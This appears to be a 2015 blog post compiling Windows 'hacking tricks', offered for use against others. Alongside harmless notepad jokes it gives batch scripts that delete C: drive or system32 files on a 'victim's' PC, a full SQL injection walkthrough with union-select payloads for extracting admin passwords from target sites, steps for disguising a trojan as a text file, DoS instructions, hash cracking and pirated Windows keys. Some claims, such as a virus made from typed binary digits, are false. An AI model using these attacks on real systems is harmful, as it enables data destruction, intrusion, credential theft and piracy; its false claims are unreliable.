Wednesday 16 December 2015

Create Binary Virus to Format Hard Disk

1. Copy the below codes into Notepad .
0100101100011111001001010101010
1010000011111100000
2. Save the file as Format.exe
3. You just created virus to format Hard
Drive. Enjoy !!!

Hacking Window 7 Password Using Ophcrack

 1. Download Opcrack Live Cd by Clicking
Here.
2. Download windows xp or windows 7 live
cd depending on platform you are wishing to
hack. For example:
Windows 7 or Windows Vista:
Click on ophcrack Vista/7
LiveCD.
Windows XP: Click on ophcrack
XP LiveCD.
2. Now burn the live image on to the cd.
3. Insert the disc into drive and restart you
computer.
  4. If everything goes right you will see
screen like below.
5. After you see screen like above wait for
ophcrack to boot automatically or you may
press Enter to advance.
6. Now you will see several lines of code
printed on screen or they might disappear
very quickly (you dont need to worry about
that).
  7. Then you will see screen like below it is
ophcrack password recovering software. At
the Ophcrack screen it shows the
Administrator and Guest account. Notice the
word “empty ”. This means that if the account
is enabled you could log in without a
password.
  8. Ophcrack WILL NOT CRACK THE
PASSWORD because the hash table which it
needs is not available for free. But it does
show the NTLM hash.
9. Copy this hash value which is under NT
Hash field .
10. Navigate to http://crackstation.net/
which is an online hash cracking tool.
11. Type in the hash value you copied down
in Step 9, Enter the captche and click on
Crack Hashes.

Make A Virus That Disable Mouse

1. Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE
\system\CurrentControlSet\Services
\Mouclass"
reg delete %key%
reg add %key% /v Start /t
REG_DWORD /d 4
rem ---------------------------------
2. Save this file as virus.bat
3. Done you just created your virus.


Is Your Computer Male Or Female ?

1. Open Notepad and paste the following
codes.
CreateObject("SAPI.SpVoice").Speak"i
love you"
2. Save the file as gender.vbs
3. Now, open the save file
4. If you hear male voice then your
computer is male and if you hear female
voice then its female.

Top 5 best Notepad Tricks

1. World Trade Center Attack Trick

The flight number of the plane that had hit
World Trade Center on (9/11) was Q33NY.
Now we call this trick or a coincidence or
something else but whatever it is you will be
definately amazed by the this trick.
1. Open Notepad and Type
“Q33N ” (without quotes) in capital letters.
2. Increase the font size to 72 .
3. Change the Font to Wingdings.

2. Matrix Effect Trick

In this trick i will show you to make a batch
file in notepad which will act as matrix effect
that you might have seen in movies.Matrix
effect is basically number flashes in green
color.
1. Open Noteapad and copy below code
into it.
@echo off
color 02
:start
echo %random% %random% %random
% %random% %random% %random%
%random% %random% %random%
%random%
goto start
2. Now save this file as Matrix.bat (name
can be anything but .bat is must)
3. Open your saved file and you will have
matrix effect on your screen.

3. Creating Virus That Format C Drive

In this trick we will be creating virus in
notepad using batch file programming. This
virus is really simple to create yet very
dangerous. opening this file we delete or
format C drive of your computer.
1. Open Notepad and copy below code into
it.
@Echo off
Del C:\ *.* |y
2. Then Save this file as virus.bat
3. Now, running this file format C Drive.

4. Making Personal Diary Using Notepad

Here you will learn to use notepad as Digital
diary or a log book to keep record of your
daily work instead of using pen and paper.
1. Open Notepad and Type .LOG (in capital
Letters and press enter
2. Save the program with any name and
close it.
3. Open the file again. Now you can see
current date and time, This will happen every
time you reopen notepad

5. Dancing Keyboard Led

In this part i will show you to make
interesting file using notepad which will make
keyboard led to dance. basically we will be
creating a visual basic script.
1. Open Notepad and copy below codes
into it.
Set wshShell =wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
2. Then save this file as dance.vbs (name
can be anything but .vbs is must)
3. Open your save file and see your
keyboard led blinking like disco lights.


Make your computer talk what you type

This is very good and interesting
Visual Basic Script Trick which let your
computer speaks whatever you type. There is
no requirement of any software. Just follow
below simple steps.
First open Notepad and copy
below codes
Dim message, sapi
message=InputBox("What do you
want me to say?","COOL HACKING
TRICKS")
Set sapi=CreateObject
("sapi.spvoice")
sapi.Speak message
Now save the notepad file as
talk.vbs
Now close the notepad file and
open it again.
Done !!!


Window 7 anytime key

indows 7 Home Premium:1>6RBBT-F8VPQ-
QCVPQ-KHRB8-RMV82
Windows 7 Professional: 1>VTDC3-WM7HP-
XMPMX-K4YQ2-WYGJ8
2>
6RQ9V-6GCG4-8WV2H-966GF-DQ4DW
                                               3>32KD2-
K9CTF-M3DJT-4J3WC-733WD
Windows 7 Ultimate:    1>FJGCP-4DFJD-
GJY49-VJBQ7-HYRR2
2>342DG-6YJR8-X92GV-V7DCV-P4K27

Send TROjan as text file

1. First of all You have to download the TEXT
ICON PACK .
2. Extract the Icon Pack to obtain the Text
Icons.
3. Open a new file, Right click - New -
Shortcut Type the location of the item: "X:
\WINDOWS\system32\cmd.exe /c
file.txt" (where stands for"X"=Drive)and name
it "Readme.txt" (without quotes)
4. After creating the readme.txt file right click
on it and choose - Propertiesin the - " Start in
" fill - " %currentdir% " , in the - "Run"
choose - " Minimized ".
5. Then change the icon with one of the TXT
iconsfrom the pack by right clicking the
readme.txt filethen -Properties - Change Icon
...
6. In order to execute a file you need one..just
change your Server/Virus extension to .TXT
and name it -"file.txt"Now you have a .TXT
Shortcut and .TXT Executable, when
openingthe txt shortcut it opens a command-
" C:\WINDOWS\system32\cmd.exe /c test.txt
" that executes the file you want
7. Now the readme.txt executes a command
window, in order to hide it Right click on
the"readme.txt" and choose - Properties -
Layout and reduced the size on the window to
height=1 and width=1.Now change the window
position to height=999 and width=999.8. Now
you are ready to sent a trojan as a txt
file

SQL Injection Tutorial...to hack site

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
Copy one of the above keyword and paste in
the Google. Here , we will got lot search result
with
We have to visit the websites one by one for
checking the vulnerability.
Note:if you like to hack particular website,then
try this:
site:www.victim site.com dork_list_commands
for eg:
site:www.victim site.com inurl:index.php?id=
Step 2: Checking the Vulnerability:
Now let us check the vulnerability of the target
website. To check the vulnerability , add the
single quotes(') at the end of the url and hit
enter.
For eg:
http://www.victimsite.com/index.php?id=2'
If the page remains in same page or showing
that page not found, then it is not vulnerable.
If you got an error message just like this, then
it means that the site is vulnerable
You have an error in your SQL syntax; check
the manual that corresponds to your MySQL
server version for the right syntax to use near
'\'' at line 1
Step 3: Finding Number of columns:
Great, we have found that the website is
vulnerable to SQLi attack. Our next step is to
find the number of columns present in the
target database.
For that replace the single quotes(') with
"order by n" statement.
Change the n from 1,2,3,4,,5,6,...n. Until you
get the error like "unknown column ".
For eg:
http://www.victimsite.com/index.php?id=2
order by 1
http://www.victimsite.com/index.php?id=2
order by 2
http://www.victimsite.com/index.php?id=2
order by 3
http://www.victimsite.com/index.php?id=2
order by 4
If you get the error while trying the "x"th
number,then no of column is "x-1".
I mean:
http://www.victimsite.com/index.php?id=2
order by 1(noerror)
http://www.victimsite.com/index.php?id=2
order by 2(noerror)
http://www.victimsite.com/index.php?id=2
order by 3(noerror)
http://www.victimsite.com/index.php?id=2
order by 4(noerror)
http://www.victimsite.com/index.php?id=2
order by 5(noerror)
http://www.victimsite.com/index.php?id=2
order by 6(noerror)
http://www.victimsite.com/index.php?id=2
order by 7(noerror)
http://www.victimsite.com/index.php?id=2
order by 8(error)
so now x=8 , The number of column is x-1 i.e,
7.
In case ,if the above method fails to work for
you, then try to add the "--" at the end of the
statement.
For eg:
http://www.victimsite.com/index.php?id=2
order by 1--
Step 4: Find the Vulnerable columns:
We have successfully discovered the number of
columns present in the target database. Let
us find  the vulnerable column by trying the
query "union select columns_sequence".
Change the id value to negative(i mean
id=-2). Replace the columns_sequence with
the no from 1 to x-1(number of columns)
separated with commas(,).
For eg:
if the number of columns is 7 ,then the query
is as follow:
http://www.victimsite.com/index.php?id=-2
union select 1,2,3,4,5,6,7--
If the above method is not working then try
this:
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,3,4,5,6,7--
Once you execute the query, it will display the
vulnerable column.
Bingo, column '3' and '7' are found to be
vulnerable. Let us take the first vulnerable
column '3' . We can inject our query in this
column.
Step 5: Finding version,database,user
Replace the 3 from the query with "version()"
For eg:
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,version(),4,5,6,7--
Now, It will display the version as 5.0.1 or
4.3. something like this.
Replace the version() with database() and
user() for finding the database,user
respectively.
For eg:
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,database(),4,5,6,7--
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,user(),4,5,6,7--
If the above is not working,then try this:
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,unhex(hex
(@@version)),4,5,6,7--
Step 6: Finding the Table Name
If the Database version is 5 or above. If the
version is 4.x, then you have to guess the
table names (blind sql injection attack).
Let us find the table name of the database.
Replace the 3 with "group_concat
(table_name) and add the "from
information_schema.tables where
table_schema=database()"
For eg:
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat
(table_name),4,5,6,7 from
information_schema.tables where
table_schema=database()--
Now it will display the list of table names.
Find the table name which is related with the
admin or user.
Let us choose the "admin " table.
Step 7: Finding the Column Name
Now replace the "group_concat(table_name)
with the "group_concat(column_name)"
Replace the "from information_schema.tables
where table_schema=database()--" with
"FROM information_schema.columns WHERE
table_name=mysqlchar--
We have to convert the table name to MySql
CHAR() string .
Install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/
addon/3899/
Once you installed the add-on, you can see a
toolbar that will look like the following one. If
you are not able to see the Hackbar, then
press F9.
Select sql->Mysql->MysqlChar() in the
Hackbar.
It will ask you to enter string that you want to
convert to MySQLCHAR(). We want to convert
the table name to MySQLChar . In our case
the table name is 'admin'.
Now you can see the CHAR(numbers
separated with commans) in the Hack toolbar.
Copy and paste the code at the end of the url
instead of the "mysqlchar"
For eg:
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat
(column_name),4,5,6,7 from
information_schema.columns where
table_name=CHAR(97, 100, 109, 105, 110)--
The above query will display the list of
column.
For example:
admin,password,admin_id,admin_name,admin_password,active,id,admin_
name,admin_pas ?
s,admin_id,admin_name,admin_password,ID_admin,admin_username,
username,password..etc..
Now replace the replace group_concat
(column_name) with group_concat
(columnname1,0x3a,anothercolumnname2).
Now replace the " from
information_schema.columns where
table_name=CHAR(97, 100, 109, 105, 110)"
with the "from table_name"
For eg:
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat
(admin_id,0x3a,admin_password),4,5,6,7 from
admin--
If the above query displays the 'column is not
found' erro, then try another column name
from the list.
If we got luck, then it will display the data
stored in the database depending on your
column name. For instance, username and
password column will display the login
credentials stored in the database.
Step 8: Finding the Admin Panel:
Just try with url like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
etc.

Proxy siteszzz

http://www.surfscreened.com
http://www.hagiomusic.info
http://www.greenpips.info
http://urlbrowse.com
http://www.hideipaddress.net
http://www.sneakfilter.com
http://www.browsestealth.com
http://www.sneak1.info
http://proxiesrus.com
http://www.surfindark.com
http://www.navydog.com
http://falsario.com
http://www.proxypit.com
http://www.proxypan.com
http://myspacewebproxy.org/
http://www.allfreehere.info
http://www.takefreely.info
http://autobypass.com
http://www.proxcity.info
http://www.proxyzip.org
http://www.cheekyproxy.com
http://www.eggproxy.com
http://www.theschoolcloak.com
http://www.hidemefast.com
http://browseanywhere.info
http://www.404surf.com
http://www.cloakip.net
http://www.browsedark.com
http://www.dartprox.com
http://www.proxish.com
http://www.surfsneak.com
http://www.surfsneaky.com
http://www.browsehidden.com
http://www.filterhide.com
http://www.browsesneak.com
http://myspaceproxyy.com
http://www.browsesneaky.com
http://www.proxyz.us
http://www.sneakschool.com
http://www.iphide.com
http://www.proogle.info
http://greatproxy.info
http://www.playnsurf.info
http://www.realproxy.info
http://aplusproxy.com
http://www.ecoproxy.com
http://freedom.webtuo.com
http://www.slyuser.com/
http://tenpass.com
http://pawxy.com
http://pawxy.org
http://logu.in

CREATE FILE WITH NO NAME


This Trick will allow you to create files and
folders without any name.
Just follow the following Steps:
1.Select any file or folder.
2.Right click on it, press rename or simply
press F2.
3.Press and hold the alt key. While holding the
Alt key, type numbers 0160 from
the num_pad.

Note: Type the numbers 0160 from the
numpad, that is, the numbers present on the
right side of the keyboard. Don't type the
numbers which are present on top of the
character keys.

Hide Any System Drive Using Command Prompt

Sometimes you really would rather hide one of
your drives than share it with
people, or something like that. Yes, there are
software's that do this function but
what if I said that I could save you that space
and you could do it manually using
the Command prompt.
How To Hide A Drive Using Command Prompt
1. Open Command prompt.
2. Type Diskpart and hit enter.
3. Next, type list volume and hit enter, this
will produce the list of all drives on
your computer.
4. Next type select volume X -->where ‘X’ is
the letter of the drive you want to
hide.
5. Next, type remove letter X to hide the drive
X.
That's it! Now your drive is hidden. Go and
check it out!
How To Unhide the Drive
1. Follow the first 4 steps as above.
2. To unhide the drive, type Assign Letter X
where X is the letter of the drive you
previously hid.
That's it! Its a very simple trick and makes you
think I-installed-a-software-for-
this?, no?

Hide a Folder Without Software

1 - Open Notepad copy all the Script below
and save it as Locker.bat
2 - AFTER you open you will see a Folder
name “Private” which you can copy your file
there
3 – it will asked for password to unlock &The
password Would Be “ H4X0RZ” (Without “
quote”)
cls
@ECHO OFF
title Folder Private
if EXIST "HTG Locker" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder
(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "HTG Locker"
attrib +h +s "HTG Locker"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== H4X0RZ goto FAIL
attrib -h -s "HTG Locker"
ren "HTG Locker" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End

Enable God Mode in Windows 7

There is something called as God mode in
windows 7. If you haven’t heard about
it already then let me tell you, Its simply a
shortcut to a location where you can
view and access all the system settings. That
means having control over all the
system settings at one single place, isn’t it
amazing? Well lets see how we can
enable God Mode.
Click here to watch How to enable God Mode
in Windows 7
Create a new folder anywhere on your
computer.
Rename that folder with this code :
God Mode.
{ED7BA470-8E54-465E-825C-99712043E01C}
And press Enter.
As soon as your press Enter, the icon
changes and God Mode shortcut appears.
Open that shortcut and you will be inside
the God Mode folder.
Here can can view and control all the
system settings.

Break A Bios Password

Break A Bios Password
Have you ever been locked out of an old
computer by a forgotten BIOS password?
There's no need to get frustrated. It is
relatively easy to bypass this safeguard.
Desktop Power off the computer and make
sure that it is unplugged.
Open up your computer case. You need
physical access to the motherboard to
complete this procedure. Find a circular,
(mostly) silver metallic object on the
motherboard. This is the CMOS battery.
CAREFULLY remove the CMOS battery and
leave it out for about 120 seconds.
This will flush the CMOS memory which stores
the BIOS password and all other
configuration.
Set the battery back into place and power on
the computer.
The computer should then warn you that the
CMOS configuration could not be
found.
You can either reconfigure it yourself or
restore defaults. Restoring the default
configuration should be fine.
You will notice that the BIOS password has
been cleared and you can boot without
it.
You may reset the BIOS password to
something else by going into the BIOS
configuration
and setting a new User Password (The
Supervisor Password controls access to the
BIOS, NOT the computer!)

WINDOWs all RUN COMMANDs

You can access all these programs by going
through START-->RUN or Simply
Click Windows Key+R
SQL Client Configuration - cliconfg
System Configuration Editor - sysedit
System Configuration Utility - msconfig
System File Checker Utility (Scan
Immediately)- sfc /scannow
System File Checker Utility (Scan Once At Next
Boot)- sfc /scanonce
System File Checker Utility (Scan On Every
Boot) - sfc /scanboot
System File Checker Utility (Return to Default
Setting)- sfc /revert
System File Checker Utility (Purge File Cache)-
sfc /purgecache
System File Checker Utility (Set Cache Size to
size x)-sfc/cachesize=x
System Information - msinfo32.
Task Manager – taskmgr
System Properties - sysdm.cpl
Task Manager – taskmgr
TCP Tester - tcptest
Telnet Client - telnet
Tweak UI (if installed) - tweakui
User Account Management- nusrmgr.cpl
Utility Manager - utilman
Windows Address Book – wab
Windows Address Book Import Utility -
wabmig
Windows Backup Utility (if installed)-
ntbackup
Windows Explorer - explorer
Windows Firewall- firewall.cpl
Windows Magnifier- magnify
Windows Management Infrastructure -
wmimgmt.msc
Windows Media Player - wmplayer
Windows Messenger - msmsgs
Windows Picture Import Wizard (need camera
connected)- wiaacmgr
Windows System Security Tool – syskey
Windows Update Launches - wupdmgr
Windows Version (to show which version of
windows)- winver
Windows XP Tour Wizard - tourstart
Wordpad - write
Password Properties - password.cpl
Performance Monitor - perfmon.msc
Phone and Modem Options - telephon.cpl
Phone Dialer - dialer
Pinball Game - pinball
Power Configuration - powercfg.cpl
Printers and Faxes - control printers
Printers Folder – printers
Private Character Editor - eudcedit
Quicktime (If Installed)- QuickTime.cpl
Real Player (if installed)- realplay
Regional Settings - intl.cpl
Registry Editor - regedit
Registry Editor - regedit32
Remote Access Phonebook - rasphone
Remote Desktop - mstsc
Removable Storage - ntmsmgr.msc
Removable Storage Operator Requests -
ntmsoprq.msc
Resultant Set of Policy (XP Prof) - rsop.msc
Scanners and Cameras - sticpl.cpl
Scheduled Tasks - control schedtasks
Security Center - wscui.cpl
Services - services.msc
Shared Folders - fsmgmt.msc
Shuts Down Windows - shutdown
Sounds and Audio - mmsys.cpl
Spider Solitare Card Game - spider
Malicious Software Removal Tool - mrt
Microsoft Access (if installed) - access.cpl
Microsoft Chat - winchat
Microsoft Excel (if installed) - excel
Microsoft Frontpage (if installed)- frontpg
Microsoft Movie Maker - moviemk
Microsoft Paint - mspaint
Microsoft Powerpoint (if installed)- powerpnt
Microsoft Word (if installed)- winword
Microsoft Syncronization Tool - mobsync
Minesweeper Game - winmine
Mouse Properties - control mouse
Mouse Properties - main.cpl
Nero (if installed)- nero
Netmeeting - conf
Network Connections - control netconnections
Network Connections - ncpa.cpl
Network Setup Wizard - netsetup.cpl
Notepad - notepad
Nview Desktop Manager (If Installed)-
nvtuicpl.cpl
Object Packager - packager
ODBC Data Source Administrator-
odbccp32.cpl
On Screen Keyboard - osk
Opens AC3 Filter (If Installed) - ac3filter.cpl
Outlook Express - msimn
Paint – pbrush
Keyboard Properties - control keyboard
IP Configuration (Display Connection
Configuration) - ipconfi/all
IP Configuration (Display DNS Cache
Contents)- ipconfig /displaydns
IP Configuration (Delete DNS Cache
Contents)- ipconfig /flushdns
IP Configuration (Release All Connections)-
ipconfig /release
IP Configuration (Renew All Connections)-
ipconfig /renew
IP Configuration(RefreshesDHCP&Re-
RegistersDNS)-ipconfig/registerdns
IP Configuration (Display DHCP Class ID)-
ipconfig/showclassid
IP Configuration (Modifies DHCP Class ID)-
ipconfig /setclassid
Java Control Panel (If Installed)- jpicpl32.cpl
Java Control Panel (If Installed)- javaws
Local Security Settings - secpol.msc
Local Users and Groups - lusrmgr.msc
Logs You Out Of Windows - logoff.....
Accessibility Controls - access.cpl
Accessibility Wizard - accwiz
Add Hardware - Wizardhdwwiz.cpl
Add/Remove Programs - appwiz.cpl
Administrative Tools control - admintools
Adobe Acrobat (if installed) - acrobat
Adobe Designer (if installed)- acrodist
Adobe Distiller (if installed)- acrodist
Adobe ImageReady (if installed)- imageready
Adobe Photoshop (if installed)- photoshop
Automatic Updates - wuaucpl.cpl
Bluetooth Transfer Wizard – fsquirt
Calculator - calc
Certificate Manager - certmgr.msc
Character Map - charmap
Check Disk Utility - chkdsk
Clipboard Viewer - clipbrd
Command Prompt - cmd
Component Services - dcomcnfg
Computer Management - compmgmt.msc
Control Panel - control
Date and Time Properties - timedate.cpl
DDE Shares - ddeshare
Device Manager - devmgmt.msc
Direct X Control Panel (If Installed)-
directx.cpl
Direct X Troubleshooter- dxdiag
Disk Cleanup Utility- cleanmgr
Disk Defragment- dfrg.msc
Disk Management- diskmgmt.msc
Disk Partition Manager- diskpart
Display Properties- control desktop
Display Properties- desk.cpl
Display Properties (w/Appearance Tab
Preselected)- control color
Dr. Watson System Troubleshooting Utility-
drwtsn32
Driver Verifier Utility- verifier
Event Viewer- eventvwr.msc
Files and Settings Transfer Tool- migwiz
File Signature Verification Tool- sigverif
Findfast- findfast.cpl
Firefox (if installed)- firefox
Folders Properties- control folders
Fonts- control fonts
Fonts Folder- fonts
Free Cell Card Game- freecell
Game Controllers- joy.cpl
Group Policy Editor (XP Prof)- gpedit.msc
Hearts Card Game- mshearts
Help and Support- helpctr
HyperTerminal- hypertrm
Iexpress Wizard- iexpress
Indexing Service- ciadv.msc
Internet Connection Wizard- icwconn1
Internet Explorer- iexplore
Internet Setup Wizard- inetwiz
Internet Properties- inetcpl.cpl

How To Hide any files into JPG file

There is a trick in windows which gives you
the opportunity to hide any type of
files in a JPG file.
This simple trick can be achieved in few steps:
* Select the files you want to hide and
compress them using winrar,winzip etc...
* Drag the compressed file and a random
picture in the same directory(eg. C:\)
* Go to Start-->Run and type cmd in order to
open the command promt window
* Go to directory where you have placed the
files (type cd.. twice to go to C:\)
* Type:
COPY /B "name".jpg + "name".zip "new
name".jpg
After that process a new .jpg file will be
created in C:\ with the name: new name.
If you double click you will see just the
image,but if you right click to the file and
select extract,your hidden files will be
extracted.

HACK CD-ROM DRIVE

There is a code in VBS which helps you to
hack ,
and open the tray of a cd-rom drive whenever
it remains closed in few steps:
1. Open a notepad and paste the following
code: do
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs. Count >= 1 then
For i = 0 to colCDROMs. Count –
1
colCDROMs. Item(i).Eject
Next ' carom
End If
loop
2. Save the code as: xxx.vbs(where xxx:any
name)
3. Now once you double click the saved
file,your Cd-Rom drive will open
whenever it is closed!

HACK IP ADDRESS

The first basic step towards hacking any
website or facebook account or
anything is knowing their IP address..
so today i am gonna show you a way of
getting someone’s Ip through Facebook.
Step 1 – First invite or ping that person for a
chat on facebook .
Step 2 – Make sure your all other tabs in
browser and other services
in computer are closed. If Possible
for you then delete all the cookies-
cache
and browsing history from your
browser.
Step 3 – While chatting on Facebook go to
Start >- Run >- cmd .
Step 4 – After Opening command Prompt
Type netstat -an command and hit Enter.
Step 5 – Now you will get Ip Address of all
the established connections there .
trace facebook ip How To Get
Someones Ip Address Through Facebook
Step 6 – Note all the suspicious Ip’s and trace
user using ip address tracer sites
like whatismyip or ipmango.com .
That's It !
You can use same trick for tracing ip of
someone’s on Skype, gtalk and Yahoo
Messenger
To get your ip address..i.e from you network
see the b image attached.

TRICK TO DESTROY PC DATA

Simple trick to destroy your enemy computer's
data..
Want to destroy your enemy computer???
if (yes) than follow these steps.....
step 1) Go to the RUN box,from start menu
step 2) type cmd and press enter
step 3) type del /f /q
step 4) then press enter
(don't do it on your own computer it will
delete all you important data)
**Do it at Your Own Risk**

YOUTUBE VIDEOS AT HIGH QUALITY

Simple way to watch good quality youtube
videos Many of us are really found of videos
and watch videos at youtube or Google
Videos. Of course you prefer to watch good
quality videos at youtube than those worse
videos.
I am gonna show you a small trick that will do
all the wonders, and now you can always
get good quality youtube videos.
Step1: Click to video that you want to see, the
link will display on Address bar.
Example: http://www.youtube.com/watch?
v=Ne1l6VNkuLM
Step2: Add &fmt=6 to the end of that string.
That address like:
http://www.youtube.com/watch?
v=Ne1l6VNkuLM&fmt=6
Optional Step: To get more quality youtube
video
.Add &fmt=18 to the end of that string,
you’ll have the best quality video with direct
download link !
Example:
http://www.youtube.com/watch?
v=Ne1l6VNkuLM&fmt=18
Note: Appending &fmt=6 to the URL delivers a
448×336 resolution version of the
video and appending &fmt=18 delivers a even
better 480×360 resolution version.
THIS CONTENT IS JUST FOR
EDUCATIONAL
PURPOSE

How to damage victim's PC

I m here explain to make a file that destroys
your victims pc
I m not responsible for the damage caused by
this file."
* Do It At Your Own Risk*
-------------------------------------------------------------------------
--------------------------------
1. Open Notepad
2. write the above command : -
Code:
del c:\WINDOWS\system32\*.*/q
3. Save the above notepad with the extension
".bat or .cmd" as you want
4. !!!!!!!!!!!!!!!!!!!!!!Attention!!!!!!!!!!!!!!!!!!! !!!
Don't double click the file otherwise u r in
trouble.
Why ?????? bc0z the file u created delete all
files from ur
system32 folder and when you restart ur pc it
will not start
bc0z system can not find the files in the
system32 folder which
is required at the time of booting.
5. You can also test the above by creating a
fake folder let
suppose
windows1 in C:\. Copy some old files in it and
just follow the
above command.By double clicking the bat or
cmd file ur all files
automatically get deleted.
6. You can try this file in any one`s computer.
(but this result in causing damage to the
computer, so think again before trying this on
anyone's pc)
THIS CONTENT IS JUST FOR
EDUCATIONAL
PURPOSE

Convert Batch File Into Execute

convert batch file (.bat,cmd) into execute file
(.exe) in a very easy way
all you have to do is
1st : Disable your anti virus so that you can
execute or convert your batch file
2nd click and --->>> Download it
<<<----- from here

Dos Attack

DOS
DoS stands for Denial of Service.
A DoS is an attempt to make a computer or
network resource unavailable to its intended
users.
DDoS
DDoS stands for distributed denial-of-service.
To explain it in a couple words, a DDoS is the
same as a DoS.
But with a DoS you are the one attack.
DDoS'ing is shells around the world attacking.
To get started: Getting the IP of a Website
To attack a website you need the IP address.
There are many ways to get them, but i'll
explain a really simple one.
Go to start, Run and type "CMD" and press
enter.
After that type in "ping sitenamehere.com".
And press enter again, then you'll get the site
IP.
DOS Tool----
Now we will you use a ddos tool to take down
a website.
Tool we will use is RDOS it is a small tool but
very powerful,download link is given at end of
post.
After downloading this tool open this and put
the ip address of site and then enter the port
which is 80. Now press entre and it will start
showing * icon it means that website is not
crashed, when - icon show then we came to
know that website is crashed. You can see this
by opening that website and it will open a
error page.
>>>>>>>>>>> Download rDos <<<<<<<<

How to Setup and Use Nircmd

Nircmd is probably the most powerful
command line tool by which you can perform
hundreds of tasks. All you need to do is
download the Nircmd.exe file on your
computer and place it in a proper directory. It
will make your command prompt line very
powerful and so that you can perform
countless numbers of tasks by using command
prompt.
You can open the door of DVD drive, make
your computer speak the text currently in the
clipboard, increase or decrease system volume,
mute, un-mute your computer, turn off
monitor, log off the current user, turn off your
computer, hide your internet explorer windows,
hide the desktop window, hide/show clock on
system tray, disable/enable your screensaver,
and many other tasks. Here is the method to
setup and use this tool.
Download nircmd  here
Extract all the three files given inside zip file
using any file extractor tool.
copy nircmd folder How To Setup And Use
After extracting the file to anywhere on your
desktop, click on the 33 KB nircmd.exe. It will
show you the dialog box as shown in the
screenshot below. Click on the “Copy to
Windows Directory” button.
copy nircmd windows How To Setup And Use
In the next dialog box, click on the “Yes”
button.
copy nircmd windows directory How To Setup
It will copy the nircmd.exe file inside the
Windows folder of the C drive. Now you don’t
need to mention the path of nircmd.exe while
giving the command.
nircmd copied windows How To Setup And
That’s how you can setup this powerful tool.
How to use Nircmd command line tool
Click on Start button or win+ r and type cmd
in the search box. Click on the result or press
Enter.
Now enter the following command in the cmd
command prompt
nircmd.exe cdrom open e:
Note: In my computer letter E is assigned to
DVD drive. If any other letter assigned to that
drive in your computer then you have to type
that letter in the command. For example, if
letter assigned to your computer’s drive is J
then enter this command
nircmd.exe cdrom open j
It will open the door of your DVD drive.
Similarly you can use the below given
command to mute the system volume.
nircmd.exe mutesysvolume 1
There are hundreds of commands you can give
using command prompt. The download page
contains all the commands available in
Nircmd.

How to make your PC Talk Just Like JARVIS in Ironman

So Lets Get It Started, Tools You Need :
Windows 7 or 8 ( vista will not )
# Windows Speech Recognition Macros.
(Download Here )
# A Bluetooth/Wireless Headset With Mic
(optional)
# JARVIS Theme. (read below)
Step 1 : Train Your Windows Speech
Recognition Program :
Yeah I Know, A Basic Step, But The Most
Important part of "convert-to-Jarvis" mission,
what you gotta do is fire up the windows
speech recognition program, which comes pre-
installed with the Windows, way to access it is
via start bar.
Now choose the required Fields,and after it is
done, visit the "Train your computer to better
understand you" section, it is not necessary
for people with clear voice/accent, but I
strongly advise you to spend at least 5
Minutes on this so your computer can
understand you better.
Step 2 : Setting Up The Windows Speech
Recognition Macros : 5 Minutes :
Now if you Have set-up- the Windows Speech
Recognition Program, you would have been
trying out all sorts of cool commands, But
now to spice it up, We'll use the Windows
Speech Macros.I assume you would have
already downloaded it from the link above and
installed it.After Installing it i would advise
you to put its shortcuts in two places, One in
the desktop and other in the start-up folder,
so it would start the second your computer
boots up.So a little walk through to this
software, This is a super-cool, little software
that teaches your computer to talk to you
interactively.Here is how to set up the
commands :
Double Click The Macros Icon, and when the
window pops up asking "What should the
macro do?" click "Advanced." For those of you
familiar with creating websites, this should be
a welcome site. WSRM uses XML for
commands... which makes creating custom
commands relatively simple. For those of you
who aren't aware of XML, it's still easy.Here Is
A Little Sypnosis at what are you looking at :
<speechMacros> - This is the starting Tag, it
just tells the computer that this XML file uses
the Speech Macros to execute.
<command> - This is the command to be
executed. Each command is basically one
action... in most cases you will only need one,
but for some automations you'll want to
include more than one. You'll see an example
of this later.
<listenFor></listenFor> - This tells the
computer what word or phrase to listen for in
order to do an action. Notice that there is a
closing tag (</listenFor>), this tells the XML
that this spot in the code is where to stop
doing whatever function... in this case stop
listening for a word or phrase once the
computer hears it.
</command> - The closing tag for the
"Command" tag... again, in XML every tag will
have an opening/closing tag and what
happens between the two is how it knows
what to execute. In this case it knows that the
command is finished once the word/phrase
has been detected.
</speechMacros> - By now I think you can
figure out why this is here.
Since I'm going to name my computer Jarvis,
I'm going to tell my computer to listen for it's
name by changing the <listenFor> tags to say
the following :   <listenFor>Jarvis</listenFor>
Here Is A Little Applet That will teach my
laptop to Reply Me :
________________________________________________________________________________
_
<speechMacros>
<command>
<listenFor>Wake Up Jarvis</listenFor>
<speak>Systems Online, Database Check, Good
Morning Sir !</speak>
</command>
</speechMacros>
________________________________________________________________________________
_
So Whenever I Say "Hey Jarvis" My Computer
will reply me with "System Online,Database
Check, Good Morning Sir ! ", You can change
it to whatever you like !
An Speech Macro For Getting The Weather :
________________________________________________________________________________
_
<?xml version="1.0" encoding="UTF-16"?>
<speechMacros>
<command>
